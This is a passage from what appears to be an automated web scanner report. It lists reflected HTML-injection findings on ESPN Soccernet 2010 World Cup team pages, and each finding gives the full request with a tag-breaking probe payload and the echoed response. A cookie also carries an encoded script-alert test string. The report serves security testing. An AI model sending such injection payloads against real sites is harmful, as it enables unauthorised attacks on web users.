GET /worldcup2010/team/_/team/455/greece5bf60"><a>27f1ff77858 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:10:41 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:10:41 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Cache-Expires: Sat, 06 Nov 2010 23:15:41 GMT Content-Length: 82126 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Greece Football / S ...[SNIP]... <a href="/worldcup2010/team?team=455&_slug_=greece5bf60"><a>27f1ff77858&topId=766098&linktext=Rehhagel+steps+down+as+Greece+coach"> ...[SNIP]...
5.86. http://soccernet.espn.go.com/worldcup2010/team/_/team/455/greece [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/455/greece
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9866"><a>90f66760c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/455/greece?a9866"><a>90f66760c97=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:55 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sat, 06 Nov 2010 23:13:54 GMT Content-Length: 82234 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Greece Football / S ...[SNIP]... <a href="/worldcup2010/team?team=455&a9866"><a>90f66760c97=1&_slug_=greece&a9866"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f1e2"><a>30af7f0b19c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/467/south-africa6f1e2"><a>30af7f0b19c HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:58 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:58 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Cache-Expires: Sat, 06 Nov 2010 23:33:58 GMT Content-Length: 82316 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Africa Footba ...[SNIP]... <a href="/worldcup2010/team?team=467&_slug_=south-africa6f1e2"><a>30af7f0b19c&topId=792945&linktext=South+African+president+praises+side"> ...[SNIP]...
5.88. http://soccernet.espn.go.com/worldcup2010/team/_/team/467/south-africa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/467/south-africa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1ec"><a>0e9b1b1a4b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/467/south-africa?4c1ec"><a>0e9b1b1a4b5=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:27:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:27:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN33 Cache-Expires: Sat, 06 Nov 2010 23:32:12 GMT Content-Length: 82424 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Africa Footba ...[SNIP]... <a href="/worldcup2010/team?team=467&4c1ec"><a>0e9b1b1a4b5=1&_slug_=south-africa&4c1ec"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9049"><a>2c9ee8a6c83 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/468/slovakiac9049"><a>2c9ee8a6c83 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:25 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Cache-Expires: Sat, 06 Nov 2010 23:33:25 GMT Content-Length: 81977 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovakia Football / ...[SNIP]... <a href="/worldcup2010/team?team=468&_slug_=slovakiac9049"><a>2c9ee8a6c83&topId=803490&linktext=Dutch+ease+to+2-1+win+against+Slovakia"> ...[SNIP]...
5.90. http://soccernet.espn.go.com/worldcup2010/team/_/team/468/slovakia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/468/slovakia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c864f"><a>dc103401107 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/468/slovakia?c864f"><a>dc103401107=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:25:17 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:25:17 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Cache-Expires: Sat, 06 Nov 2010 23:30:17 GMT Content-Length: 82085 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovakia Football / ...[SNIP]... <a href="/worldcup2010/team?team=468&c864f"><a>dc103401107=1&_slug_=slovakia&c864f"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69682"><a>ede52c78078 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/472/slovenia69682"><a>ede52c78078 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:12 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:12 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:33:12 GMT Content-Length: 81860 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovenia Football / ...[SNIP]... <a href="/worldcup2010/team?team=472&_slug_=slovenia69682"><a>ede52c78078&topId=801122&linktext=Slovenia+come+to+terms+with+exit"> ...[SNIP]...
5.92. http://soccernet.espn.go.com/worldcup2010/team/_/team/472/slovenia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/472/slovenia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64674"><a>258595f7676 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/472/slovenia?64674"><a>258595f7676=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:25:20 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:25:20 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Cache-Expires: Sat, 06 Nov 2010 23:30:19 GMT Content-Length: 81968 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
